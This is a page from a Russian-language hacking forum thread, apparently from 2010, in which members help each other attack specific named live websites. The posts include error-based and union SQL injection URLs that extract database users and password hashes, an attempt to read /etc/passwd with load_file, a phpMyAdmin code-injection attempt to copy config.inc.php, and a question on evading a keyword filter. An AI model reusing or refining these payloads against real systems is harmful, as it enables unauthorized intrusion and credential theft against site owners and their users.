ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1187 из 1393 « Первая < 187687108711371177 1183 1184 1185 1186 1187 1188 1189 1190 1191 119712371287 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #11861  
Старый 09.03.2010, 22:02
mental2
Познающий
Регистрация: 13.08.2007
Сообщений: 37
Провел на форуме:
232729

Репутация: 1
По умолчанию
phpmyadmin

при запросе..

site.com/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by="]); OR exec('cp $(pwd)"/config.inc.php" config.txt'); &sort_order=desc&token=....

На сколько я понял в документации стоит специальная ошибка (или не стоит ).. но исправив её всё-равно не работает. Тестирую на версии 2.11.8.1

Выбивает ошибку.

Цитата:
Помилка

SQL-запит: Документація

SELECT `information_schema`.`SCHEMATA` . *
FROM `information_schema`.`SCHEMATA`
GROUP BY BINARY `information_schema`.`SCHEMATA`.`SCHEMA_NAME`
ORDER BY BINARY `"]) OR exec('cp $(pwd)"/config.inc.php" config.txt');` DESC

Відповідь MySQL: Документація
#1054 - Unknown column '"]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); ' in 'order clause'
получается фильтруется переменная sort_by? Или может я где накосячил?
Последний раз редактировалось mental2; 09.03.2010 в 22:45..
 
Ответить с цитированием

  #11862  
Старый 09.03.2010, 22:24
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию
Цитата:
Сообщение от j0ker13  
http://www.tomydate.com/search_results.php?keyword=1'
помогите)
http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*fro m(select+name_const(version(),1),name_const(versio n(),1))a)--+
Цитата:
Сообщение от overcrookd  
http://enjoy.md/category.php?id=6+or+1=if%28load_file%28%27/etc/passwd%27%29+is+not+NULL,1,2%29--+
значит всё же file_priv=Y? если я чёт намудрил плз исправьте
нету там доступа к файлам
Цитата:
Сообщение от overcrookd  
кстати: @@datadir - /var/lib/mysql/
а при ошибке даёт другой путь: /home/vhosts/enjoy.md/public_html/category.php
так датадир это домашняя дира самого мускула, кстате еслиб была возможность читать файлы можно было бы слить сразу инфу всю с таблиц если буфер позволит) а то что при ошибки это директория самого сайта видная из веба
Последний раз редактировалось warlok; 09.03.2010 в 22:32..
 
Ответить с цитированием

  #11863  
Старый 10.03.2010, 02:44
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию
решил разобратся с логикой запроса от warlok'a
прочитал статью квазара
Цитата:
mysql> SELECT concat(user,0x3a,password) FROM user LIMIT 1;
+------------------------------------------------+
| concat(user,0x3a,password) |
+------------------------------------------------+
| root:*9669961C585153793F9B665C709E9A7DF18 |
+------------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT concat(user,0x3a,password) FROM user LIMIT 2),1);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
mysql> select version();
+-----------------+
| version() |
+-----------------+
| 5.0.83-0ubuntu3 |
что не так?

и почему не прокатывает
http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*fro m(select+name_const(user(),1),name_const(user(),1) )a)--+
Цитата:
Message: Can't execute query: Incorrect arguments to NAME_CONST
Последний раз редактировалось j0ker13; 10.03.2010 в 02:53..
 
Ответить с цитированием

  #11864  
Старый 10.03.2010, 02:55
overcrookd
Новичок
Регистрация: 08.03.2010
Сообщений: 5
Провел на форуме:
8681

Репутация: 0
По умолчанию
дело в этом:

union SELECT concat_ws(0x3a,user,password)+FROM user LIMIT 0,1--+

перебор лимитом:
0,1
1,1
2,1 и т.д.
Последний раз редактировалось overcrookd; 10.03.2010 в 03:17..
 
Ответить с цитированием

  #11865  
Старый 10.03.2010, 03:05
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Цитата:
Сообщение от j0ker13  
решил разобратся с логикой запроса от warlok'a
прочитал статью квазара

что не так?

и почему не прокатывает
http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*fro m(select+name_const(user(),1),name_const(user(),1) )a)--+
Код:
http://www.tomydate.com/search_results.php?keyword=1')+or+1=(select+1+from+(select+count(0),concat((select+user()+from+information_schema.tables+limit+1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
 
Ответить с цитированием

  #11866  
Старый 10.03.2010, 03:26
overcrookd
Новичок
Регистрация: 08.03.2010
Сообщений: 5
Провел на форуме:
8681

Репутация: 0
По умолчанию
Цитата:
http://www.tomydate.com/search_results.php?keyword=1')+or+1=(select+1+from +(select+count(0),concat((select+user()+from+infor mation_schema.tables+limit+1),floor(rand(0)*2))+fr om+information_schema.tables+group+by+2+limit+1)a) --+
чёт не могу втыкнуть в этот запрос совсем, не могли бы обьяснить или сылку дать
просто в других иньекциях не пашет
 
Ответить с цитированием

  #11867  
Старый 10.03.2010, 04:01
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
нужна помощь:
в скрипте стоит защита такого плана. Насколько я понял, ищется вхождение слов from и union в запрос(ну вернее в id). Если они есть, то сервер выдаёт error с мылом web-мастера. Как можно обойти это дело?
FrOm не подходит
 
Ответить с цитированием

  #11868  
Старый 10.03.2010, 04:04
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
ссылку надо, вариантов масса (защиты)
 
Ответить с цитированием

  #11869  
Старый 10.03.2010, 04:06
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
http://www.gtbit.org/news/viewitem.php?id=37

ещё в чём фишка:
если так
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+table_name+from+information_schema.tables),1,1))=53
то страница Not Acceptable
а если
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+123+from+123),1,1))=53
то Internal Server Error

Довольно странно, получается что запрос выполняется
Последний раз редактировалось Seravin; 10.03.2010 в 04:19..
 
Ответить с цитированием

  #11870  
Старый 10.03.2010, 04:31
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
оно там еще по ip банит, сцуко
 
Ответить с цитированием
Ответ
Страница 1187 из 1393 « Первая < 187687108711371177 1183 1184 1185 1186 1187 1188 1189 1190 1191 119712371287 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ